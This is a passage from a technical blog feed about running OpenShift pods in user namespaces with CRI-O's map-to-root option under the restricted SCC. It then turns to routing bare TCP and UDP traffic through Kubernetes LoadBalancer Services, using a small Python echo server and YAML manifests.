<span id="cb4-6"><a href="#cb4-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb4-7"><a href="#cb4-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb4-8"><a href="#cb4-8" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb4-9"><a href="#cb4-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb4-10"><a href="#cb4-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb4-11"><a href="#cb4-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb4-12"><a href="#cb4-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span></code></pre></div>
<p>The <strong><code>io.openshift.userns</code></strong> annotation selects the CRI-O workload
profile that we added via the <code>MachineConfig</code> above. This profile
enables several other annotations, but does not automatically
execute the Pod in a user namespace. For that, you must <em>also</em>
supply the <strong><code>io.kubernetes.cri-o.userns-mode</code></strong> annotation. Its
argument tells CRI-O to automatically select unique host UID range
of size 65536 to map into the container’s user namespace.</p>
<p>I created the Pod as user <code>test</code>:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
pod/fedora created</code></pre>
<p>Observe that it was admitted via the <code>restricted</code> SCC:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
    | jq &#39;.metadata.annotations.&quot;openshift.io/scc&quot;&#39;
&quot;restricted&quot;</code></pre>
<p>Unfortunately, the container is not running:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
  | jq &#39;.status.containerStatuses[].state&#39;
{
  &quot;waiting&quot;: {
    &quot;message&quot;: &quot;container create failed: time=\&quot;2022-02-02T05:43:34Z\&quot; level=error msg=\&quot;container_linux.go:380: starting container process caused: setup user: cannot set uid to unmapped user in user namespace\&quot;\n&quot;,
    &quot;reason&quot;: &quot;CreateContainerError&quot;
  }
}</code></pre>
<p>The core error message is: <strong><em>cannot set uid to unmapped user in
user namespace</em></strong>. This arises because, in the absense of a
<code>runAsUser</code> specification in the PodSpec, the <code>restricted</code> SCC has
defaulted it to a value from the UID range assigned to the project:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
  | jq &#39;.spec.containers[].securityContext.runAsUser&#39;
1000650000</code></pre>
<p>The project UID range allocation is recorded in the project and
namespace annotations:</p>
<pre class="shell"><code>% oc get -o json project/test namespace/test \
    | jq &#39;.items[].metadata.annotations.&quot;openshift.io/sa.scc.uid-range&quot;&#39;
&quot;1000650000/10000&quot;
&quot;1000650000/10000&quot;</code></pre>
<p>OpenShift allocated to project <code>test</code> a range of 10000 UIDs starting
at <code>1000650000</code>. The error arises because UID <code>1000650000</code> is not
mapped in the user namespace. The host UID range may be something
like <code>200000</code>–<code>265535</code>, whereas the sandbox’s UID range is
<code>0</code>–<code>65535</code>.</p>
<p>I deleted the Pod and will try something different:</p>
<pre class="shell"><code>% oc delete pod/fedora
pod &quot;fedora&quot; deleted</code></pre>
<p>Let’s say that we want to run the container process as UID <code>0</code> <em>in
the Pod’s user namespace</em>, as would be required for a systemd-based
workload. Instead of leaving it to the SCC machinery, I’ll set
<code>runAsUser: 0</code> in the PodSpec myself:</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb11-1"><a href="#cb11-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb11-2"><a href="#cb11-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb11-3"><a href="#cb11-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb11-4"><a href="#cb11-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb11-5"><a href="#cb11-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb11-6"><a href="#cb11-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb11-7"><a href="#cb11-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;auto:size=65536&quot;</span></span>
<span id="cb11-8"><a href="#cb11-8" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb11-9"><a href="#cb11-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb11-10"><a href="#cb11-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb11-11"><a href="#cb11-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb11-12"><a href="#cb11-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span>
<span id="cb11-13"><a href="#cb11-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb11-14"><a href="#cb11-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">runAsUser</span><span class="kw">:</span><span class="at"> </span><span class="dv">0</span></span></code></pre></div>
<p>This time the <code>test</code> user cannot even create the Pod:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
Error from server (Forbidden): error when creating &quot;pod-fedora.yaml&quot;…</code></pre>
<p>I’ve trimmed the rather long error message, but the core problem is:</p>
<pre><code>spec.containers[0].securityContext.runAsUser: Invalid value:
0: must be in the ranges: [1000650000, 1000659999]</code></pre>
<p>The <code>restricted</code> SCC only allows <code>runAsUser</code> values that fall in the
projects assigned UID range. And this is what we would expect. The
problem is that the admission machinery has no awareness of user
namespaces. It cannot discern that <code>runAsUser: 0</code> means that we
want to run as UID <code>0</code> <em>inside the user namespace</em>, whilst mapped to
an unprivileged UID on the host.</p>
<p>The problem is twofold. First, we are unable to control the UID
mapping that CRI-O gives us, so that it would coincide with the
project’s UID range. Second, the SCC admission checks and
defaulting is oblivious to user namespace. <code>runAsUser</code> is
interpreted as referring to host UIDs, and the <code>restricted</code> SCC
restricts (or defaults) us to values that are not mapped in the
Pod’s user namespace.</p>
<h2 id="solution">Solution <a href="#solution" class="section">§</a></h2>
<p>The <code>map-to-root</code> option in the <code>userns-mode</code> annotation provides a
solution to this dilemma. It takes whatever value <code>runAsUser</code> is,
and ensures that that host UID gets mapped to UID <code>0</code> in the Pod
user namespace. The updated PodSpec is:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb14-1"><a href="#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb14-2"><a href="#cb14-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb14-3"><a href="#cb14-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb14-4"><a href="#cb14-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb14-5"><a href="#cb14-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">annotations</span><span class="kw">:</span></span>
<span id="cb14-6"><a href="#cb14-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.openshift.userns</span><span class="kw">:</span><span class="at"> </span><span class="st">&quot;true&quot;</span></span>
<span id="cb14-7"><a href="#cb14-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">io.kubernetes.cri-o.userns-mode</span><span class="kw">:</span></span>
<span id="cb14-8"><a href="#cb14-8" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="st">&quot;auto:size=65536;map-to-root=true&quot;</span></span>
<span id="cb14-9"><a href="#cb14-9" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb14-10"><a href="#cb14-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">securityContext</span><span class="kw">:</span></span>
<span id="cb14-11"><a href="#cb14-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">runAsUser</span><span class="kw">:</span><span class="at"> </span><span class="dv">1000650000</span></span>
<span id="cb14-12"><a href="#cb14-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb14-13"><a href="#cb14-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> fedora</span></span>
<span id="cb14-14"><a href="#cb14-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> registry.fedoraproject.org/fedora:35-x86_64</span></span>
<span id="cb14-15"><a href="#cb14-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">command</span><span class="kw">:</span><span class="at"> </span><span class="kw">[</span><span class="st">&quot;sleep&quot;</span><span class="kw">,</span><span class="at"> </span><span class="st">&quot;3600&quot;</span><span class="kw">]</span></span></code></pre></div>
<p>Now the Pod is able to run:</p>
<pre class="shell"><code>% oc --as test create -f pod-fedora.yaml
pod/fedora created

% oc get -o json pod/fedora \
  | jq &#39;.spec.nodeName, .status.containerStatuses[].state&#39;
&quot;ci-ln-fizz88k-72292-9phfc-worker-c-7s99v&quot;
{
  &quot;running&quot;: {
    &quot;startedAt&quot;: &quot;2022-02-02T06:20:49Z&quot;
  }
}</code></pre>
<p>We can observe the UID mapping:</p>
<pre class="shell"><code>% oc rsh pod/fedora cat /proc/self/uid_map
         1     265536      65535
         0 1000650000          1</code></pre>
<p>This shows that UID <code>0</code> in the Pod’s user namespace maps to UID
<code>10000650000</code> in the parent (host) user namespace. The remaining
UIDs <code>1</code>–<code>65536</code> in the Pod’s user namespace are mapped contiguously
from UID <code>265536</code> in the host user namespace.</p>
<p>Objective achieved.</p>
<h3 id="why-runasuser-must-be-specified">Why <code>runAsUser</code> must be specified <a href="#why-runasuser-must-be-specified" class="section">§</a></h3>
<p>Referring back to the PodSpec, why is it necessary to explicitly
specify <code>runAsUser</code>? Doesn’t the SCC admission machinery
automatically set the default value? Well… yes, and no. The SCC
machinery defaults <code>runAsUser</code> in each <em>container’s</em>
<code>securityContext</code> field. But it does not set it in the <em>Pod’s</em>
<code>securityContext</code>. And it is the <em>Pod</em> <code>securityContext</code> that CRI-O
examines when processing the <code>map-to-root</code> option. If it is unset,
<code>CRI-O</code> will not set the mapping up properly and container(s) will
fail to run.</p>
<p>The consequence of this is that the user or operator creating the
Pod must first examine the Project or Namespace object to learn what
its assigned UID range is. Then it must set the
<code>spec.securityContext.runAsUser</code> field to the start value of that
range. The range assignment will certainly differ from project to
project so it cannot be hardcoded. This is a bit annoying: more
work for the human operator, or more automation behaviour to
implement and maintain.</p>
<p>The simplest solution I can think of is to enhance the SCC
processing to also set <code>spec.securityContext.runAsUser</code> if it is
unset. Then CRI-O would see the value it needs to see.
Alternatively CRI-O could be enhanced to check the container
<code>securityContext</code> if the <code>runAsUser</code> is not specified in the Pod
<code>securityContext</code>. But to me this seems ill principled because
different containers (in the same Pod) could specify different
values, and there is no obvious “right” way to resolve the
ambiguities.</p>
<h2 id="using-multiple-uids">Using multiple UIDs <a href="#using-multiple-uids" class="section">§</a></h2>
<p>Although I have a nice range of 65536 UIDs mapped in the Pod’s user
namespace, I am not able to run processes as any UID other than <code>0</code>.
This is beacuse the <code>restricted</code> SCC forcibly omits <code>CAP_SETUID</code>
(among others) from the capability bounding set of the container
process. Complex workloads, including any based on systemd, will
fail to run properly under such a constraint.</p>
<p>The simplest workaround is to admit the Pod via the <code>anyuid</code> SCC.
But that undoes the good outcome achieved in this post!</p>
<p>An intermediate workaround is the create a new SCC that does not
forcibly deprive containers of <code>CAP_SETUID</code>. This entails
administrative overhead.</p>
<p>It also increases the attack surface. The <code>setuid(2)</code> system call
is restricted to UIDs mapped in the UID namespace of the calling
process. If the calling process is in an isolated user namespace
that maps to unprivileged host UIDs, it is safe (up to kernel bugs)
to grant <code>CAP_SETUID</code> to that process. But recall that user
namespaces are still opt-in; by default Pods use the host user
namespace. An SCC can use <code>MustRunAsRange</code> to restrict the
<em>initial</em> container process to running as a user in the project’s
assigned UID range. But if that SCC also lets containers use
<code>CAP_SETUID</code>, then it doesn’t really provide more protection than
<code>anyuid</code></p>
<p>A more robust solution would be to modify CRI-O to <em>reinstate</em>
<code>CAP_SETUID</code> and related capapbilities when the Pod runs in a user
namespace. I will raise the topic with the CRI-O maintainers, as
solving this problem is important for our use case, and probably
other “legacy” workloads too.</p>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="section">§</a></h2>
<p>In this post I demonstrated how to run workloads in a user namespace
on OpenShift, under the default <code>restricted</code> SCC. The <code>map-to-root</code>
option is critical to accomplishing this. There is an unfortunate
“rough edge” in that the workload must specifically refer to the UID
range assigned to the namespace in which the Pod will live, which
means additional work for or complexity in the operator (human or
otherwise).</p>
<p>Despite this progress, if you need to run processes under different
UIDs in the container(s), the <code>restricted</code> UID won’t work because it
deprives the container process of the <code>CAP_SETUID</code> capability. You
must go back to admitting the workload via <code>anyuid</code> or a similar
SCC, which is a significant erosion of the security boundaries
between containers and the host. This issue will be the subject of
future investigations.</p>]]></summary>
</entry>
<entry>
    <title>Bare TCP and UDP ingress on Kubernetes</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-11-18-k8s-tcp-udp-ingress.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-11-18-k8s-tcp-udp-ingress.html</id>
    <published>2021-11-18T00:00:00Z</published>
    <updated>2021-11-18T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="bare-tcp-and-udp-ingress-on-kubernetes">Bare TCP and UDP ingress on Kubernetes</h1>
<p>Kubernetes and OpenShift have good solutions for routing HTTP/HTTPS
traffic to the right applications. But for ingress of bare TCP
(that is, not HTTP(S) or TLS with SNI) or UDP traffic, the situation
is more complicated. In this post I demonstrate how to use
<code>LoadBalancer</code> Service objects to route bare TCP and UDP traffic to
your Kubernetes applications.</p>
<h2 id="example-service">Example service <a href="#example-service" class="section">§</a></h2>
<p>For testing purposes I wrote a basic echo server. It listens on
both TCP and UDP port 12345, and merely upper-cases and returns the
data it receives:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode python"><code class="sourceCode python"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> socketserver</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="im">import</span> threading</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> serve_tcp():</span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>    <span class="kw">class</span> Handler(socketserver.StreamRequestHandler):</span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>        <span class="kw">def</span> handle(<span class="va">self</span>):</span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a>            <span class="cf">while</span> <span class="va">True</span>:</span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a>                data <span class="op">=</span> <span class="va">self</span>.rfile.readline()</span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a>                <span class="cf">if</span> <span class="kw">not</span> data:</span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a>                    <span class="cf">break</span></span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a>                <span class="va">self</span>.wfile.write(data.upper())</span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a>    <span class="cf">with</span> socketserver.TCPServer((<span class="st">&#39;&#39;</span>, <span class="dv">12345</span>), Handler) <span class="im">as</span> server:</span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a>        server.serve_forever()</span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a><span class="kw">def</span> serve_udp():</span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a>    <span class="kw">class</span> Handler(socketserver.DatagramRequestHandler):</span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a>        <span class="kw">def</span> handle(<span class="va">self</span>):</span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a>            <span class="va">self</span>.wfile.write(<span class="va">self</span>.rfile.read().upper())</span>
<span id="cb1-20"><a href="#cb1-20" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-21"><a href="#cb1-21" aria-hidden="true" tabindex="-1"></a>    <span class="cf">with</span> socketserver.UDPServer((<span class="st">&#39;&#39;</span>, <span class="dv">12345</span>), Handler) <span class="im">as</span> server:</span>
<span id="cb1-22"><a href="#cb1-22" aria-hidden="true" tabindex="-1"></a>        server.serve_forever()</span>
<span id="cb1-23"><a href="#cb1-23" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-24"><a href="#cb1-24" aria-hidden="true" tabindex="-1"></a><span class="cf">if</span> <span class="va">__name__</span> <span class="op">==</span> <span class="st">&quot;__main__&quot;</span>:</span>
<span id="cb1-25"><a href="#cb1-25" aria-hidden="true" tabindex="-1"></a>    threading.Thread(target<span class="op">=</span>serve_tcp).start()</span>
<span id="cb1-26"><a href="#cb1-26" aria-hidden="true" tabindex="-1"></a>    threading.Thread(target<span class="op">=</span>serve_udp).start()</span></code></pre></div>
<p>The <code>Containerfile</code> adds this program to the official Fedora 35
container and declares the entry point:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode dockerfile"><code class="sourceCode dockerfile"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="kw">FROM</span> fedora:35-x86_64</span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="kw">COPY</span> echo.py .</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="kw">CMD</span> [ <span class="st">&quot;python3&quot;</span>, <span class="st">&quot;echo.py&quot;</span> ]</span></code></pre></div>
<p>I published the container <a href="https://quay.io/repository/ftweedal/udpecho.">image on Quay.io</a>. The Pod spec
references it:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Pod</span></span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb3-6"><a href="#cb3-6" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb3-7"><a href="#cb3-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb3-8"><a href="#cb3-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">containers</span><span class="kw">:</span></span>
<span id="cb3-9"><a href="#cb3-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> server</span></span>
<span id="cb3-10"><a href="#cb3-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">image</span><span class="kw">:</span><span class="at"> quay.io/ftweedal/udpecho:latest</span></span></code></pre></div>
<p>I defined a new project namespace <code>echo</code> and created the Pod:</p>
<pre class="shell"><code>% oc new-project echo
Now using project &quot;echo&quot; on server
  &quot;https://api.ci-ln-4ixdypb-72292.origin-ci-int-gce.dev.rhcloud.com:6443&quot;.

…

% oc create -f pod-echo.yaml
pod/echo created</code></pre>
<h2 id="create-service-object">Create Service object <a href="#create-service-object" class="section">§</a></h2>
<p>My application is not talking HTTP, so I can’t use the normal
Ingress or Route facilities to get traffic to my app.</p>
<div class="note">
<p>HTTP and HTTPS traffic includes the <strong><code>Host</code></strong> header, which the
ingress system can inspect to route requests to a particular Pod.
Similarly, TLS with the <strong><em>Server Name (SNI)</em></strong> extension allows TLS
traffic to be routed to a particular Pod (the Pod will perform the
handshake). Neither approach works for UDP packets or “bare” TCP
connections.</p>
</div>
<p>Therefore, I define a <code>LoadBalancer</code> Service. The service
controller will ask the cloud provider to create a load balancer
that routes external traffic into the cluster. For example, on AWS
it will (by default) create an ELB (<em>Elastic Load Balancer</em>)
instance.</p>
<div class="sourceCode" id="cb5"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb5-2"><a href="#cb5-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb5-3"><a href="#cb5-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb5-4"><a href="#cb5-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb5-5"><a href="#cb5-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb5-6"><a href="#cb5-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb5-7"><a href="#cb5-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb5-8"><a href="#cb5-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb5-9"><a href="#cb5-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb5-10"><a href="#cb5-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> tcpecho</span></span>
<span id="cb5-11"><a href="#cb5-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb5-12"><a href="#cb5-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span>
<span id="cb5-13"><a href="#cb5-13" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> udpecho</span></span>
<span id="cb5-14"><a href="#cb5-14" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> UDP</span></span>
<span id="cb5-15"><a href="#cb5-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span></code></pre></div>
<p>OK, let’s create the Service:</p>
<pre class="shell"><code>% oc create -f service-echo.yaml 
The Service &quot;echo&quot; is invalid: spec.ports: Invalid value:
[]core.ServicePort{core.ServicePort{Name:&quot;tcpecho&quot;, Protocol:&quot;TCP&quot;,
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:&quot;&quot;},
NodePort:0}, core.ServicePort{Name:&quot;udpecho&quot;, Protocol:&quot;UDP&quot;,
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:&quot;&quot;},
NodePort:0}}: may not contain more than 1 protocol when type is
&#39;LoadBalancer&#39;</code></pre>
<p>Well, that’s unfortunate. Kubernetes does not support
<code>LoadBalancer</code> services with mixed <code>protocol</code>. <a href="https://github.com/kubernetes/enhancements/issues/1435">KEP 1435</a> is in
progress to address this. It is a gated “alpha” feature <a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.20.md">since
Kubernetes 1.20</a>. Cloud provider support is
currently <a href="https://github.com/kubernetes/enhancements/issues/1435#issuecomment-969523031">mixed</a> but work is ongoing.</p>
<p>So for now, I have to create separate Service objects for UDP and
TCP ingress. As a consequence, there will be <strong>different public IP
addresses for TCP and UDP</strong>. Whether this is a problem depends on
the application. Applications that use <code>SRV</code> records to locate
servers can handle this scenario. Kerberos is such an application
(modern implementations, at least). Applications that use <code>A</code> or
<code>AAAA</code> records directly might have problems.</p>
<p>The other downside is cost. Cloud providers charge money for load
balancer instances. The more you use, the more you pay.</p>
<p>Below is the definition of my decomposed Service objects:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb7-3"><a href="#cb7-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb7-4"><a href="#cb7-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> echo-udp</span></span>
<span id="cb7-5"><a href="#cb7-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb7-6"><a href="#cb7-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">type</span><span class="kw">:</span><span class="at"> LoadBalancer</span></span>
<span id="cb7-7"><a href="#cb7-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb7-8"><a href="#cb7-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> echo</span></span>
<span id="cb7-9"><a href="#cb7-9" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb7-10"><a href="#cb7-10" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="kw">-</span><span class="at"> </span><span class="fu">name</span><span class="kw">:</span><span class="at"> udpecho</span></span>
<span id="cb7-11"><a href="#cb7-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> UDP</span></span>
<span id="cb7-12"><a href="#cb7-12" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">12345</span></span>
<span id="cb7-13"><a href="#cb7-13" aria-hidden="true" tabindex="-1"></a><span class="pp">---</span></span>
<span id="cb7-14"><a href="#cb7-14" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb7-15"><a href="#cb7-15" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb7-16"><a href="#cb7-16" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
